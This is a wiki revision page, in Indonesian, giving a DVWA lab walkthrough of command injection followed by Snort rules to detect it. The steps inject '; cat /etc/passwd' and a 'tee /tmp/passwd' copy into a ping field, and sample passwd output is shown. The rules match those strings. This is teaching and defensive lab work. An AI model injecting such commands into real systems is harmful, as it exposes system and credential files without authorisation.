Difference between revisions of "DVWA: Command Injection"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 58: | Line 58: | ||
alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;) | alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;) | ||
alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;) | alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;) | ||
− | alert tcp any any -> 192.168.0.100 80 (msg:"cat+%2Fetc%2Fpasswd"; content:" | + | alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;) |
+ | alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;) | ||
sebaiknya pilih yang paling spesifik, jangan yang general. | sebaiknya pilih yang paling spesifik, jangan yang general. |
Revision as of 19:42, 31 March 2017
- Login ke DVWA
- Klik Command Injection
- Ping isi IP yang bisa di ping misalnya, router anda, misalnya
192.168.0.223
- Hasilnya kira-kira
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
- Tambahkan perintah cat sesudah nomor IP, misalnya
192.168.0.223; cat /etc/passwd
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin .. .. dst
- Lihat source DVWA mengapa melakukan hal itu
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php
- Kalau iseng, coba copy password ke tmp, inject command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd
Snort Rule
Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut
alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;) alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;) alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;) alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;) alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;)
sebaiknya pilih yang paling spesifik, jangan yang general.